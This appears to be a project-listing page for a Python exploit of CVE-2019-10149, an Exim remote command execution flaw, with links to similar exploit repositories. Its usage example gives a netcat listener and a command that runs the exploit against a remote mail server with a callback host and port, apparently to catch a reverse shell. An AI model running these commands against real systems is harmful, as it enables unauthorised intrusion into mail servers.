All Projects → Diefunction → CVE-2019-10149

Diefunction / CVE-2019-10149

Licence: other
CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to CVE-2019-10149

vulristics
Extensible framework for analyzing publicly available information about vulnerabilities
Stars: ✭ 46 (+206.67%)
Mutual labels:  exploit, cve
inthewilddb
Hourly updated database of exploit and exploitation reports
Stars: ✭ 127 (+746.67%)
Mutual labels:  exploit, cve
Cve 2019 0708 Tool
A social experiment
Stars: ✭ 87 (+480%)
Mutual labels:  exploit, cve
Labs
Vulnerability Labs for security analysis
Stars: ✭ 1,002 (+6580%)
Mutual labels:  exploit, cve
pwn-pulse
Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)
Stars: ✭ 126 (+740%)
Mutual labels:  exploit, cve
Vulmap
Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞利用功能
Stars: ✭ 1,079 (+7093.33%)
Mutual labels:  exploit, cve
cve-2016-1764
Extraction of iMessage Data via XSS
Stars: ✭ 52 (+246.67%)
Mutual labels:  exploit, cve
Cve 2019 1003000 Jenkins Rce Poc
Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
Stars: ✭ 270 (+1700%)
Mutual labels:  exploit, cve
PatrowlHearsData
Open-Source Vulnerability Intelligence Center - Unified source of vulnerability, exploit and threat Intelligence feeds
Stars: ✭ 66 (+340%)
Mutual labels:  exploit, cve
dirtycow
radare2 IO plugin for Linux and Android. Modifies files owned by other users via dirtycow Copy-On-Write cache vulnerability
Stars: ✭ 93 (+520%)
Mutual labels:  exploit, cve
Cve 2020 15906
Writeup of CVE-2020-15906
Stars: ✭ 39 (+160%)
Mutual labels:  exploit, cve
PocOrExp in Github
聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or Exp from Github by CVE ID.
Stars: ✭ 544 (+3526.67%)
Mutual labels:  exploit, cve
Cve 2017 0065
Exploiting Edge's read:// urlhandler
Stars: ✭ 15 (+0%)
Mutual labels:  exploit, cve
CVE-2021-41773 CVE-2021-42013
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
Stars: ✭ 20 (+33.33%)
Mutual labels:  exploit, cve
Cve 2018 8120
CVE-2018-8120 Windows LPE exploit
Stars: ✭ 447 (+2880%)
Mutual labels:  exploit, cve
Gitlab rce
RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 and LFI for old gitlab versions 10.4 - 12.8.1
Stars: ✭ 104 (+593.33%)
Mutual labels:  exploit, cve
moonwalk
Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps. 👻🐚
Stars: ✭ 544 (+3526.67%)
Mutual labels:  exploit, cve
Penetration testing poc
渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
Stars: ✭ 3,858 (+25620%)
Mutual labels:  exploit, cve
minecraft-log4j-honeypot
Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam
Stars: ✭ 89 (+493.33%)
Mutual labels:  exploit, cve
CVE-2019-8449
CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
Stars: ✭ 66 (+340%)
Mutual labels:  exploit, cve

CVE-2019-10149

CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.

Example

nc -lvp 9000
python ./CVE-2019-10149/exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].